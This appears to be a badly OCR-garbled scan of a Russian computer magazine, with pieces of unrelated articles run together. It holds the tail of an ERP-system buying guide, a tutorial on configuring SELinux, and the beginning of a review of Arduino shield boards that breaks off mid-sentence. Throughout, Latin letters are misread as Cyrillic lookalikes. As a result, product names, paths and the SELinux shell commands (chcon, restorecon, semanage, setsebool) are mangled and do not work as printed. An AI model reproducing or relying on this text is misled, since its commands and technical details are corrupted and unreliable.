МЕегозоН. МЕТ, ОА, меб-сервисы. 
СУБД: РагуазГуие, М5 ЗО, Ога 50 


Рис. 7. Комплекс бизнес-решений корпорации «Галактика» 


Набор модулей 

Сотр!еге включает следующие функциональные блоки: управ- 
ление заказами (От4ег Мапагетеп(), управление снабжением 
(Ргосигетеп®) , управление запасами (Ма{еа1 Мапагетепо, 
управление проектами (Рго]ес{ Мапагетеп!), управление 
складом (\М/М$ — М/агевочзе Мапасетепе 5узет), производство 
(МапуЁасгагт?2), управление финансами (СазВ Мапасетепо, 
бухгалтерия (финансовый учет), анализ эффективности бизнеса 
(Ре!огтапсе Апа1у$1$), управление отношениями склиента- 

ми (Сизютег Ве]аноп$ Шр Мапагетеп®), управление бизнес- 
процессами (М/огк-ПЙом’ Мапасетеп®, интернет-магазин (\У/еЬ 
Зоге). 


Условия распространения 

Сотпр!еге представлено в четырех редакциях: СоттипКу Еа оп 
(обновляется раз в год), 5{ап4ата Е41 Чоп, Ргоез1опа1 Е оп, Соиа 
ЕЧ1Чоп (поставляются за плату, имеют регулярные обновления, 
поставляются через партнеров). Функциональность Соштипиу 
ЕЧ1оп включает только базовую ЕВКР-функциональность и «тол- 
стого клиента». 


«Галактика Экспресс» 

«Галактика Экспресс» — полнофункциональная ЕВР-система для 
предприятий среднего размера в России и странах СНГ, сконфигу- 
рированная на основе системы «Галактика ЕКР». 


Условия распространения 

Система «Галактика Экспресс» поставляется в двух версиях: 
«Галактика Экспресс СРВ» — свободно распространяемая версия и 
«Галактика Экспресс ВРП» — версия, распространяемая по подпи- 
ске. Для системы «Галактика Экспресс ВРП» доступна полноценная 
техническая поддержка сгарантиями поставщика и обновлениями 
системы. 


5оап$ ЕКР 


Некоторые факты 

5о1аг15 ЕКР — полнофункциональный комплекс, позволяющий 
ведином информационном пространстве выполнять типовые и 
специализированные задачи управления предприятием. Система 
изначально спозиционирована на российский рынок ЕЁВР. 


Набор модулей 

Функционально система поделена на ряд подсистем, объединен- 
ных между собой в следующие блоки: структура изделий (мно- 
гоуровневый классификатор, составы изделий, нормы расхода), 
технология изготовления (технологические операции, нормы 
времени, используемый инструмент, оснастка, задействованное 
оборудование, персонал, типовые и групповые технологии), 
взаимоотношения с контрагентами, складской учет, управление 
ценами, портфель заказов, планирование производства, дис- 
петчеризация, снабжение производства, управление закупками, 


Рис. 8. Основные функциональные модули системы «ПС: 
Управление Производственным Предприятием» 


бюджетирование, управление задачами (ТАЗК-Мапазег). 


Условия распространения 
Продукт распространяется на условиях оплаты лицензий. 


Практические советы по выбору 
решения 


Итак, после знакомства с ЕВР-системами, доминирующими на 
российском рынке, становится понятно, что выбирать придется 
влучшем случае из 4-5 систем. И вот здесь, чтобы правильно вы- 
брать наиболее подходящую систему, нужно сделать следующие 
шаги: 

1. Определить требуемый функционал системы. То есть зафик- 
сировать тот набор функциональных модулей, которые должна 
будет содержать ЕКР-система. На этом этапе это можно сделать 
просто, крупными блоками. Например, для автоматизации про- 
изводственной компании, как правило, потребуются следующие 
функциональные блоки: управление закупками, управление 
производством, управление складом, сводное планирование, 
управление продажами, управление финансами, управление от- 
ношениями с клиентами. 

2. Определить доступный нам бюджет наавтоматизацию. 

3. Определить доступную нам стоимость владения системой — 
ТСО, например, на '/ лет. 

4. С учетом полученных данных определить 4-5 подходящих под 
эти параметры систем. 

5. Далее необходимо оценить функциональность отобранных 
систем на предмет соответствия нашим требованиям. 

6. После этого свести все полученные оценки в таблицу и пере- 
ложить ее на диаграмму типа Радар. В результате получится при- 
мерно такая картина. 

Фигура максимальной площади соответствует максимально под- 
ходящему под наши требования решению. При этом, если какие- 
либо параметры имеют разный вес, что вполне логично, то перед 
этим их надо привести к общему значению. На приведенном выше 
примере, максимально подходящим решением оказалось ЕКР2. 
Итого, по результатам прочтения этой статьи, мы можем заклю- 
чить следующее: 

1. Мы увидели, что при выборе ЕКР-системы исходный круг для 
выбора не очень велик. 

2. Чтобы на ранней стадии понять, какое из решений может по- 
дойти, нужно спозиционировать свою компанию относительно 
рынка доступных решений ЕБР, сделать это по функционально- 
сти, стоимости, размеру компании, отрасли и другим субъектив- 
ным предпочтениям. 

3. Для корректного сравнения различных систем можно восполь- 
зоваться такими средствами, как рабочие встречи, оцифрованная 
оценка функциональных параметров, диаграмма Радар. Надеюсь, 
что при таком подходе, вооружившись знаниями и здравым смыс- 
лом, правильный выбор будет сделать нетрудно. = 
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ш м Евгений Зобнин [ехесЬЁ.ги) 


Бронежилет для 
корпоративного 
пингвина 


ЗЕ Шпих: министерство обороны США 


рекомендует! 


ЕЧпих снискала славу сложной в понимании и настройке системы безопасности, которая хоть и делает 
Ипих намного более устойчивой к взлому операционной системой, но создает больше проблем, чем 
приносит решений. Такая точка зрения в корне не верна, и в этой статье я покажу, что ЗЕ\пих намного 
проще и удобнее в использовании, чем это кажется на первый взгляд. 


Система $ЕМпих (5есигйу-Епвапсед Мпих — Мпих сулучшенной безо- 
пасностью] была разработана министерством обороны США и всего за 
несколько лет стала стандартом в области систем контроля прав доступа. 
Она была включена вядро Ипих версии 2.6.0 и впервые появилась как 
полностью работающая из коробки система в дистрибутиве КБеа На{ 
Ещегрязе Ипих 4. Впоследствии поддержка Е Мпих была интегриро- 
вана втакие дистрибутивы, как Оемап, Ореп5 ЗЕ и УБип\и, а допол- 
нительные пакеты, активирующие систему, были добавлены во многие 
другие более или менее популярные дистрибутивы. Именно благодаря 
ЕН пих-дистрибутиву КНЕГ 5, работающему на серверах |ВМ, удалось 
получить сертификат безопасности ЕА! 4 Аицтежед мВ АЕС_ЕЁБ.3, 
который вто время имела лишь одна операционная система — Тги$еа 
5о[аг$. ЗЕпих существенно расширяетядро пих, делая операцион- 
ные системы, построенные наего основе, пригодными киспользованию 
в сферах, где доступ кинформации должен быть строго разграничен, а 
приложения, запускаемые пользователями, должны иметь определен- 
ный набор прав, который не выходитза рамки минимально необходимо- 
го. Это делает систему привлекательной для госучреждений и военных, 
однако кажется не совсем понятным, зачем она нужна администраторам 
рядовых серверов, аужтем более — обычным пользователям [в Еедога 
5ЕЧНпих по умолчанию включен). Сейчася попытаюсь этот момент по- 
ЯСНИТЬ. 


Зачем это нужно? 


Создатели УМХ наделили свою ОС простым, но весьма гибким и краси- 
вым механизмом безопасности. В его основе лежат всем нам известные 
права доступа на файлы, которые определяют круг лиц [пользователей, 
процессов}, способных выполнять какие-либо действия над файлами 

и каталогами. Например, мы можем создать исполняемый файл ивы- 
ставить на него права доступа «-г\муихг-хг-х», что будет означать, что мы 
(то есть владелец файла] можем делать с ним все что захотим, поль- 
зователи, входящие внашу группу, могутего читать и исполнять, а все 
остальные — только исполнять. Учитываятот факт, что все устройства в 
ОМХ представлены файлами, такой механизм позволяет нетолько четко 
разграничивать доступ пользователей (их приложений] кинформации, 
но и кустройствам и даже к некоторым функциями операционной систе- 
мы (ргосЁ5 и °у<{5]. Однако, у механизма прав доступа есть два серьезных 
недостатка. Во-первых, их реализация слишком топорна. Она хорошо 
подходит для отделения процессов отконфиденциальной информации 
пользователей, но абсолютно не подходит для гибкого управления их 
возможностями. Например, чтобы дать какой-либо дисковой утилите 


(с9$К, например] возможность модификации хранящейся на диске 
информации, мы можем либо разрешить полный доступ кдиску группе, 
к которой принадлежитее владелец, либо запустить ее с правами 
пользователя гос\. Как в первом, так и во втором случае мы создадим 
потенциальную брешь в безопасности: все остальные пользователи/ 
приложения группы получат права доступа к диску, или самаутилита 
получитнаивысшие и безграничные права в системе. А что если нужно 
дать доступ не кмодификации диска, атолько к вызову определенных 
его функций (ос 7 Здесь права доступа вообще не помогут. Во-вторых, 
файлами в Чпих представлены далеко не все ресурсы операционной 
системы. Огромное количество функций ядра скрыто в более чемтрех 
сотнях системных вызовов, большая часть которых доступна для ис- 
пользования абсолютно всем процессам, а если процесс имеет права 
гоо{, то его возможности вообще никак не ограничиваются. Если, к 
примеру, мы захотим запустить ЕТР-сервер на стандартном для него 21 
порту, который доступен только процессам с правами гос\*, нам придется 
всецело довериться его разработчику, поскольку работая от гос{, ЕТР- 
сервер будет способен делать абсолютно все, и ошибка, найденная вего 
коде, даствзломщику полный контроль над системой. И это из-за про- 
стой потребности слушать привилегированный порт! ЗЕШпих решает 
эти проблемы, позволяя чрезвычайно гибко контролировать отношения 
процесса и операционной системы. С его помощью можно ограничить 
процесс в возможности обращения ктем или иным системным вызовам 
или файлам, контролироватьто, как происходит системный вызов, какие 
при этом используются аргументы, запрещать или разрешать привязку 
процесса копределенным портам, короче говоря, управлять возможно- 
стями процессов на самом низком уровне. 


Как это работает? 


Если быты читал толстую книжку без картинок, то здесьтебя должны 
были поджидать рассуждения отаких штуках, как дискреционный и ман- 
датный контроль доступа, КВАС, МСЪ и других околонаучных вещах. К 
счастью, ты читаешь 1, поэтомутебе придется прослушать более простое 
объяснение. Понять принцип работы 5ЕИпих и заложенные в него идеи 
проще всего разобравшись стем, что происходит во время его актива- 
ции. Что делает ЕМпих для того, чтобы контролировать обращения про- 
цессов кресурсам ОС? Концептуально можно выделить четыре шага: 

1. Все субъекты [процессы] и объекты (файлы, системные вызовы ит.д.) 
взаимодействия помечаются с помощью специальных меток, называе- 
мых контекстом безопасности (процессы во время запуска, файлы — во 
время создания или установки ОС, их метки хранятся в расширенных 
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атрибутах ФС, системные вызовы — при компиляции модуля $ЕМпих). 

2. Когда субъект пытается произвести какое-либо действие в отношении 
объекта, информация об этом действии поступает кобработчику 5ЕЧпих. 
3. Обработчик смотритна контексты безопасности субъекта и объекта и, 
сверяясь с написанными ранее правилами (так называемая политика], 
принимает решение о дозволенности действия. 

4. Если действие оказывается правомочным (политика его разрешает), 
объект [программа] продолжает работать в обычном режиме, в про- 
тивном случае — она либо принудительно завершается, либо получает 
вежливый отказ. В реальной ситуации все это выглядит примернотак: 
один из скриптов инициализации дистрибутива, имеющий метку гс _{ 
(на самом деле эту метку имеют порождаемые им процессы, но сейчас 
это не важно), запускает веб-сервер АрасПе с помощью файла /изг/5Ып/ 
Юра, который имеет метку ПЕра_ехес_{. Каки все остальные действия, 
запрос на эту операцию поступает в 5ЕМпих, в правилах [политике] 
которого указано, чтоп гс _{ нетолько имеет право запускать файлс 


Ограниченные пользователи 


Кроме Е пих-пользователя ипсопйпед_и, который по дефолту 
присваивается всем юзерам системы, в целевой политике 
также описано несколько непривилегированных пользователей, 
которых можно использовать для создания гостевых учетных 
записей, процессы которых будут очень ограничены в правах 
(возможности и различия этих пользователей смотри в таблице 
«Дефолтовые пользователи 5ЕМпих»). 

Чтобы создать такого пользователя, достаточно выполнить 
следующую команду: 


# изегада -7 хвие${_и имя_юзера 


Кроме этого можно сделать его дефолтовым, так что 
ограниченными будут все вновь созданные Чпих-юзеры: 


# зетападе 1о051п -т -5 Фагвежед -$ "хвие${_и" -г $0 __ 
ефаи1{__ 


Посмотреть список текущих $ЕМпих-юзеров можно так: 


# /чзг/61п/зетапазе 1о51п -1 


меткой ПИра_ехес_{, но ито, что при запуске этого файла процесс иего 
потомки должны получить метку ПЕра_{. Теперь в системе появляется 
один или несколько процессов АрасВе, помеченных как ПЕра _{. Каждый 
изних будет подчиняться правилам 5ЕМпих, относящимся к этой метке, 
поэтому, если в политике указано, что ПЕра_{ может получать доступ 
только кфайлам, помеченным как ВЕ ра_5уз_сощеп{ {и 80 порту, АрасПе 
не сможет нарушить эти правила (перевесив его на другой портмы 
попросту получим ошибку запуска]. Резонный вопрос: откуда берутся 
правила? Их пишутлюди, аточнее — мантейнеры дистрибутивов, что 

не мешает системному администратору исправить их соответственно 
своим потребностям. Обычно правила загружаются на первом этапе 
инициализации ОС, но спомощью особых приемов их можно подсунуть 
и вуже работающую систему [не перезагружать же сервер саптаймом 1,5 
года только для того, чтобы разрешить ЕТР-серверу ходить по симлин- 
кам). Типичный объем файла политик $ЕШпих для основных приложе- 
ний и сервисов дистрибутива может содержать до нескольких сотен 
тысяч строк, поэтому, чтобы не обременять админов рутинной работой, 
были созданы инструменты для их автоматической генерации спо- 
мощью обучения (например, утилита ац92аЦо\м/ позволяет составлять 
правила 5ЕМпих на основе лог-файлов подсистемы аиа!). В следую- 
щих разделах мы подробнее остановимся на этом вопросе, однако для 
начала нам следует разобраться с «политикой управления доступом на 
основе ролей». 


Управлен ис доступом наоснове 
ролей или 
Само собой разумеется, что ЗЕМпих не смог бы так радовать военных, 
если бы вего основе лежали только метки, определяющие контекст 
безопасности, и механизм разделения доступа на ихоснове (кстати, это 
называется «мандатным управлением доступом», и многие ошибочно 
приписываютего $Епих). Из-за своей низкоуровневоститакая систе- 
ма безопасности была бы слишком сложной вуправлении и негибкой, 
поэтому создатели $ЕМпих снабдили ее еще одним уровнем доступа, 
именуемым «ролями». 

Когда мы говорили о метках $ЕЧпих, я намеренно упустил из виду одну 
важную деталь. На самом деле контекст безопасности (метка] состоитне 
из одного, а изтрех компонентов (естьеще и четвертый компонент, но 

об этом пока не стоитзадумываться): имени пользователя, роли итипа 
субъекта (тот самый компонент, который оканчивается на «_+»]. Каждый 
пользователь 5ЕМпих (который может быть связан сучетной записью 
пользователя пих, но обычно все Чпих-пользователи отображаются в 
5ЕНпих-пользователя ипсопйпед_и) может выполнять несколько ролей, 
в рамках каждой из которых, ему доступны несколькотипов субъектов, 
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акаждый субъект, в свою очередь, может иметь доступ кнекоторому 
количеству объектов. 

Каки группы пользователей в классической модели управления досту- 
пом УМХ, роли используются для наделения процессов пользователя 
разными видами полномочий. Однако, фактически они нужны только 
для того, чтобы тонко регулировать доступ пользователей кданным, 

то есть при сопровождении компьютерной инфраструктуры больших 
предприятий, сотрудники которых могут иметь разные уровни доступа 
ксекретной информации (то есть, те самые военные и госучреждения). 
При использовании $ЕШпих на обычных серверах, роли не играют 
большой роли (парадокс, да и только). Любой Мпих-дистрибутив, из ко- 
робки оснащенный 5ЕИпих, поумолчанию используеттак называемую 
«целевую политику», которая предполагает наличие всего нескольких 
общих 5Епих-пользователей и ролей. Например, целевая политика 
Гедога и ВНЕЕ определяеттолько двух дефолтовых пользователей [на 
самом деле, естьеще несколько специальных пользователей, но обычно 
они не используются] и две роли: пользователь эу${етп_и, роль зу${ет_г 
и пользователь ипсопйпед_и, роль ипсопйпед_г. Первые используются 
для запуска системных процессов во время инициализации системы, и 
в политике четко указано, что запускаемые пользователем эу$ет_и (ко- 
торый имеет роль °у${егп_г] приложения должны получать конкретный 
тип субъекта (например, ПЕра {), определяемыйтипом объекта (файла), 
из которого они запускаются [например, ВИрЧ_ехес _{). В ихотношении 
действуют строгие правила ограничения, о которых мы говорили в 
предыдущем разделе. Пользователь ипсопйпед _и и роль ипсопйпед_г 
предназначены для обычных Иипих-пользователей. На последнем этапе 
инициализации системы запускается менеджер входа в систему (он 
работает в домене эу${епп_и:зу$ет_г:{одт_\), который принимаетимя 
пользователя и его парольи запускает шелл/графическую оболочку. Од- 
нако вместо того, чтобы сохранитьтекущий контекст безопасности, либо 
изменить его на зу${ет_и:зу${етп_г:5ПеЦ {в соответствии с правилами 
политики 5ЕМпих (если бытакие были), он обращается к РАМ-модулю 
рат_<еИпих, который сообщает $ Е тих, что запущенный менеджером 
входа процесс (шелл или оболочка] должен получить контекст ипсопйпе 
д_и:ипсопйпед_г:ипсопйпед _{. Смысл этого перехода втом, что целевая 
политика 5ЕМпих имеет правила, которые разрешают приложениям, ра- 
ботающим в этом контексте, делать что угодно, втом числе — запускать 
другие приложения. Однако, если пользователь запустит приложение, 

в контексте безопасности которого указан 5ЕМпих-пользователь 
зу$ет_и итип, для которого в политике есть правила, процессы этого 
приложения будут ограничены в правахточнотак же, какесли бы они 
были запущены во время инициализации. 

Если говорить о контексте безопасности файлов, то здесь роли не ис- 
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пользуются в принципе, и второе поле всегда равно об]ес(_г, а первое 
будетлибо зу$ет_и, либо ипсопйпед_и, если это файл, созданный 
пользователем. 

Таким образом, можно сказать, что при использовании целевой по- 
литики значимым полем контекста безопасности остается толькотип 
субъекта/объекта, тогда как поля пользователь и роль просто опреде- 
ляютотношение 5ЕМпих к процессу [либо он находится под контролем 
правил, либо нет). 


Работаем с системой 


Главное достоинство 5ЕШпих втом, что он абсолютно незаметен для 
многих администраторов и обычных пользователей. Приложения, для 
которых есть правила в политике, будут автоматически ограничены в 
правах, остальные программы смогут функционировать какни вчем не 
бывало. Однако, время отвремени сисадмины натыкаются на некоторые 
проблемы в работе системы, которые вынуждают их отключить 5ЕИпих. 
В этом разделе мы разберемся как решать эти проблемы в рамках воз- 
можностей 5ЕИпих, но сначалая дам несколько важных советов. 

1. 5ЕМпих должен быть включен. Глупо отключать 5ЕМпих только по- 
тому, что так рекомендуют делать многие сисадмины и пользователи. 
Работу штатных сервисов он нарушить не может, аеслитебе нужно 
расширить возможности какого-либо приложения, это всегда можно 
сделать с помощью изменения мета-настроек или отключения проверок 
для определенноготипа субъекта (позже я скажу, как это сделать). 

2. «-2» — твой друг. Да, вся эта возня с контекстами безопасности мо- 
жет вывести из себя. Но есть множество инструментов, которые позво- 
ляютвыяснитьтекущий контекст безопасности процессов и файлов: 


$ 14 -2 
$ р$ аих7 
$ 1$ -12 


Найти файлы снужным контекстом: 


$ ппа /еес -сопжехЕ '*пеф_соп+_*' 


Восстановить правильный контекст файла: 


# гезфогесоп -\ /изг/61п/ Ира 


Й Даже узнать, каким должен быть контекст фа илаи сравнить его с 
текущим: 


# таеспраПсоп -\ /муаг/ммм/Пт1/* 


3. Скажи ту - нет! Во время установки дистрибутива все файлы по- 
лучаютопределенный контекст безопасности, а все файлы, созданные в 
процессе работы, — контекст безопасности, определяемый правилами 
на основе родительского каталога (например, если создать файл внтури 
каталога /е{с, его тип автоматически станет ес _{, а для файлов каталога 
Маг/млммм/ Нил ( — ВИрЧ_<уз_сог{еп{ {. Однако это работаеттолько в 
отношении вновь созданных файлов. Во время перемещения файлас 
помощью гпу его контекст сохраняется, что может привести к отказу в 
доступе [например, АрасВе не сможет получить доступ к файлу, если его 
тип нейЕра_<уз_согепе 1. 

4. Маны — наше все. В дистрибутивах Еедога и КНЕЕ есть большое ко- 
личество пап-страниц, которые разъясняют все ограничения 5ЕМпих 
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в отношении сервисов и демонов. Например, на странице 
КЕрЧ_е!пих(8) описано, в каком контексте безопасности 
работает АрасВе, какие унего есть полномочия, какие 
контексты должны иметь доступныеему файлы. Теперь 
разберемся стем, что нужно делать, когда 5ЕМпих начинает 
мешать. Обычно это происходит вследствие того, что админ 
пытается включить определенную функцию сервиса или 
как-то перенастроить его, а Е Шпих начинает сыпать на 
экран предупреждающие сообщения. Первое, что нужно 
сделать в этой ситуации, это проверить лог-файлы. Главный 
журнальный файл 5ЕМпих носитимя /магод/ац@ /ацанк. 
(09. Туда поступают«необработанные» сообщения, которые 
могут быть полезны другим приложениям, нотрудны для 
чтениия человеком. Поэтому существует второе место, куда 
поступаютте же сообщения, но в гораздо более понятном 
формате. Это файл /маг/\о9/плеззадес, в нем сообщения 
могутвыглядетьтак: 


# вгер "5ЕЁ1пих 1$ ргемеп{1п8" /уаг/105/тез5аве$ 
Мау 7 18:55:56 1оса1Ио$* зегоиб1езИоо*: $ЕЁ1пих 15 
ргемепЕ1пя ПЕЕра (ВЕЕрая_+) "вета г" Фо /маг/имм/ 
И] /1паех.Пт1 (Поте_а1г_*). Рог сотр1ефе $ЕЁ1пих 
те$5ае$. гип зеа1ег{ -1 4е7е30а6-5488-4664-а606- 

92с9+404а3164а 


Здесь все должно быть понятно: Е пих запретил субъекту 
КЕра_{ (веб-сервер Араспе) доступ к файлу /маг/Ллммим// го И 
паех.Р(тп(натом основании, что последний имеетнепра- 
вильныйтип объекта (Воте_д!г {присваивается файлам, 
созданным в домашнем каталоге пользователя). Для полу- 
чения более детальной информации 5ЕМпих рекомендует 
выполнить команду еа(ец -[ бла-бла-бла. Эта команда вы- 
ведеточень информативное сообщение, где будутописаны 
все обстоятельства произошедшего, причины, по которым 
они могли возникнуть, атакже пути решения проблемы. 
Внашем случае причина проста: админ переместил файл 
паех.б{гп[из своего домашнего каталога с помощью гпу, 
выставил на него нужного владельца и права, но забыл из- 
менить контекст. Выхода из ситуации два. Либо присвоить 
файлу правильный контекстс помощью команды сВсоп: 


# спсоп -{ ПЕра_5у$_соп®феп{_1 \ 
/маг/имм/ Вт] /1паех.Ит1 


Либо заставить систему «сбросить» контекст всех файлов 
каталога: 


# гезфогесоп -у /уаг/ммм/ И т1 


После перезапуска АрасВе все должно быть ок. Однако этот 
метод не сработает, если мы захотим переместить корневой 
каталог Арасве в другое место [например, в Лм^^м). Дело 
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в том, что спсоп изменяет контексттолько до следующей 
переиндексации, с помощью ге${огесоп, которая сбросит 
контекст файлов каталога /л^л/м до ЧеЁаий { (по правилам 
политики все каталоги, не имеющие родительского ката- 
лога, и их файлы получаюттакой тип]. Поэтому мы должны 
изменить саму политику: 


# зетападе фсопфех* -а -* ИЕра_зу$_соп®еп*_* /ммм 
# гезФогесоп -\ /ммм 


Первая команда изменит политикутак, чтобы дефлтовым 
типом для каталога /Лллм^\м и его содержимого был ВЕра_ 
5у5_сощепЕ {, а вторая сбросит контекстего файлов, так что 
они получаттот жетип (правила $ЕШпих допускают, чтобы 
дефолтовые метки каталогов и их содержимого отличались, 
но для удобства зегпападе делает их одинаковыми). 

Также <етападе может быть использована для просмотра 
списка мета-правил: 


# сетапаёе Боо]1еап -1 


С помощью мета-правил можно контролироватьтакие 
аспекты работы приложений, как, например, возмож- 
ность веб-сервера подключаться кудаленной базе данных 
([РЕра_сап_пе\могКк_соппесЕ 96) или разрешение Нр- 
сервера читать файлы домашнего каталога пользователей 
(Ир_Боте_4!г) ит.д. Такие правила группируют в себе боль- 
шое количество низкоуровневых правил, что существенно 
упрощаетжизнь сисадмина. 

Чтобы включиты/отключитьто или иное правило, можно 
использовать команду @ероо(: 


# её 5ебоо1 ИЕра_сап_пе{могК_соппес*_а6 оп 
# зе 5ебоо1 ИЕра_сап_пемогК_соппес*_аБ о 


Указав флаг«-Р», можно сделать эти правила постоянными 
между перезагрузками. В самом крайнем случае зетападе 
можно использовать для полного отключения проверок 
ЪЕШпих в отношении определенного субъекта: 


# зетападе регт1$$1\е -а ИЕра_+ 
Включение производится с помощью похожей команды: 


# зетападе регт1$$1\е -а ИЕЕра_+ 


ВЫВОДЫ 


ЪЕШпих далеко не так страшен, как о нем говорят. Система 


хоть и сложна в понимании, но невероятно логична и удобна 


в сопровождении, а имеющиеся средствауправления по- 
зволяюточеньточно диагностировать проблемы и легко их 
устранять. == 
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КОНСТРУКТОР 


Обзор лучших $ме[0-плат для Агдипо 


© Аг4ашпо — крохотная плата с большими возможностями, типичный 
представитель Ореп Нагдмгаге и одно из первых устройств, 
завоевавших широкую популярность у аппаратных хакеров. Не 
мудрено: удобный электронный конструктор позволяет даже 
новичкам быстро разобраться и начать с нуля разрабатывать 


собственные устройства. 


Как быстро начать? 


Для быстрого начала новичку проще всего купить готовую плату — 
стоит она примерно $30. На плате будет всего два чипа — микро- 
контроллер АТМЕ! и микросхема 15В-интерфейса, к которой он 
подключен. Все остальные элементы добавляются самостоятельно 
по мере необходимости. 

Программы для Агаито (называемые на сленге «скетчами»]} пишут- 
ся на языке \\ тд. По сути, это обычный С-+, расширенный спе- 
циальными процедурами типа «Ч!аКа\М\/гКе» [записать значение в 
порт] или «апаюдКеа4д» [прочитать значение из АЦП]. Осваивается 
все это в один-два присеста, особенно если у тебя уже есть опыт 
программирования на С++. Написанные скетчи компилируются и 
загружаются в Агдито через Ц$В с помощью среды АгацтпоШЕ 
(агито.сс/еп/Маш/боЙ\аге). Чтобы собрать простейший проект 
требуются какие-то минут тридцать, без необходимости глубокого 
погружения в даташиты АТМЕЕ и конструкции ассемблера. Язык 
интуитивно понятен, а разобраться с нюансами поможет неплохой 
онлайн-хелп. Да и паять, кстати, тоже необязательно, если есть 
беспаечная макетка и набор проводков. 

Все выводы микроконтроллера выведены на два аккуратных ряда 
колодок, к которым можно подключать датчики, кнопки, дисплеи 

и тому подобное. Однако, чем сложнее обвязка, тем больше с ней 
может быть геморроя. Если речь идет про пару светодиодов и 
кнопок, то никаких сложностей. Но вот если требуется управлять 
моторами или обмениваться данными через радиоинтерфейс, воз- 
никает ряд сложностей. Для борьбы с этим пороком и придумали 
шилд-платы — готовые платы для расширения функциональности. 


Что такое $теа9-плата? 


5!е{!9-плата — это готовое решение для реализации частых задач, 
встающих перед разработчиками железа. Примерами таких задач 
могут быть и передача данных через радиоинтерфейс, и работа 
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с ЕБегпе\, и управление электронными двигателями. Платы рас- 
ширения легко устанавливаются на Агашпо, стыкуясь с колодками 
пинов и образуя весьма жесткую бутербродообразную конструкцию. 
Можно устанавливать несколько плат одновременно, главное, чтобы 
устройства не конфликтовали за одни и те же пины Агаипо. Немного 
покопавшись в сети, можно найти таблицы со списком популярных 
шилдов и занятых ими пинов (5 Ме! $(.0г9). 

Дальше остается лишь подцепить соответствующую библиотеку к 
основному скетчу и опробовать работу схемы с помощью прилагае- 
мого к библиотеке скетча-примера. При таком подходе время эконо- 
мится дважды: сначала на разработку и отладку аппаратной части, а 
затем — программной. Однако по-настоящему удачных и популярных 
шилд-плат существует всего пара десятков. Чем хороший шилд 
отличается от плохого? 

В первую очередь, на нем обязана быть кнопка сброса. Оценить 

это может любой, кто отлаживал Агацтпо с одетым шилдом — штат- 
ная кнопка сброса становится недоступной и упражнения по ее 
нажиманию при помощи подручных продолговатых предметов 
порядком раздражают. Хороший шилд также должен быть совме- 
стим с Агито Меда — если у тебя расширенная версия Агаитпо на 
АТтеда1280 или АТтеда2560, еще не факт, что с ней заработает 
шилд, созданный для привычной Упо или Оиег(апома. А все из-за 
того, что в Меда отвечающие за аппаратный 5Р|! пины перенесли в 
другое место! Так что если шилд общается с Агдито по шине $Р1, 
обязательно изучи его «брюхо» — надеяться на совместимость с 
Меда можно, если ты увидишь там не только штырьки, но и черный 
квадратный разъем-розетку 2х3. Ниже я подготовил обзор лучших 
готовых 5!е@-плат для решения частых задач. 


Управление моторами 


Если необходимо управлять моторами, смело используй шилд 
МотогМе[а, созданный талантливым американским инженером 
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Последняя версия Агаито Упо 


Лимором Фридом акКа [адуада (адуада.пе/таке/тп$е(а/). 
Главное преимущество шилда заключается в его универсально- 
сти, поскольку он поддерживает до четырех моторов прямого тока, 
до двух шаговых двигателей и двух серво-приводов. Можно ком- 
бинировать: например, один шаговый и два двигателя постоянно- 
го тока. Основу шилда обеспечивают две микросхемы счетверен- 
ного Н-моста 12930, способные выдавать ток до 600 МА на канал и 
работать напряжениями от 4,5 до 36 В. Запараллелив входы одной 
микросхемы, можно отодвинуть ограничение по току до 1,2 А. С 
помощью этого шилда можно, например, управлять одновременно 
моторами и рулевой тягой модели гоночного автомобиля, шаговы- 
ми двигателями координатного стола. Для более мощных нагрузок 
можно использовать Агаигото с чипом [298 от фирмы 5рагКРип 
[два канала с токами нагрузки до 2 А] или ее более продвинутую 
версию Моп%ег Мото 5Ме[4 (зрагКфип.сого/ргодис{$/10182] на 
двух чипах УМН2$РЗ30, способную отдавать уже до 30 А с предель- 
ным напряжением 41 В. Если дело дойдет до последнего вари- 
анта, не забудь посоветоваться со знающими спецами: все-таки 
нагрузки довольно приличные, возможно придется обзавестись 
дополнительным радиатором, чтобы не обжечься. 


Работа с ЕГете 


Существуют два основных варианта шилдов для работы с ЕФегпе{ 
— на основе старого доброго чипа ЕМС?8.)60 от Мисгоср и 
более совершенного \\/5100 от \Итпе{. Оба решения используют 
для обмена шину 5Р|, отнимая всего четыре пина Агито. Но 
ЕМС28./60 появился много раньше и явно проигрывает продвину- 
тому \\/5100: только 10 Мбит/с, нет аппаратной поддержки [Р, ЧОР, 
ТСР. Кроме того, \\/5100 позволяет работать с четырьмя сокетами 
(что означает поддержку до четырех одновременных соединений). 
В общем, настоятельно рекомендую использовать именно \/\/5100, 
потому что он существенно экономит ключевой ресурс микрокон- 
троллера — оперативную память (5РАМ)}, которую приходится эконо- 
мить (у Атеда328 — всего один килобайт). Ну и все остальные пре- 
имущества предобработки налицо: пока \\/ 5100 сам переспрашивает 
пакеты по протоколу ТСР и считает контрольные суммы заголовков, 
Ацтеда может спокойно заниматься более важными вещами. 
Другим образцовым примером является шилд Агашпо ЕФегпе 
оме[4 (агЧипо.сс/еп/Мат/АгаитоЕ егпе5Ые] от команды 
Агаитпо. С его помощью можно создать скетч, который будет спосо- 
бен: 

® получать динамический |Р-адрес по ОНСР; 

® устанавливать время по протоколу МТР; 

® резолвить имена через О0М№5; 

® проходить авторизацию через КАБО; 
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Только наличие на тыльной 
стороне разъема означает 
совместимость с Меда 


Моюг$те] от [адуада 


® выполнять функции несложного \\еб-сервера или выступать 

в качестве \еб-клиента, формируя запросы и осуществляя 

парсинг ответов. 
Из схожих плат можно отметить разработку Егее{гоп!с$ — 
Е{Бегпе5е!9 м/н РоЕЁ (геегоп!с$.сога/ргодис/еВегпе{-$Ме(- 
ми{В-рое). Идея питания Е{Вегпе(-устройства от той же линии 
Е{Бегпе\, к которой оно и подключено, родилась в 2001 году, а два 
года спустя стала официальным промышленным стандартом |1ЕЕЁЕ 
802.За{. По собственному опыту замечу, что нет ничего удобнее для 
питания автономных коробочек, которые общаются по ЕФегпе{ 
и разбросаны по зданию в радиусе 100 метров от специального 
питающего коммутатора. Стоит такой шилд чуть дороже, требует 
приобретения дополнительной микроплатки модуля РоЕ и вместо 
5О-разъема имеет макетное поле. 
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Неедито ЕтегЪо зе — поддержка Еее! 10/100 и псго50 


Применение такому шилду — исключительно в неподвиж- 

ных конструкциях, требующих взаимодействия по сети ТСР/ 

|Р. Например, отображение в браузер состояния подключенных 
датчиков или удаленное управление какими-то механизмами. 
Сразу вспоминается проект «твиттер-цветочка», в котором связка 
Агацпо+-Е{Пегпе при помощи воткнутого в землю датчика влаж- 
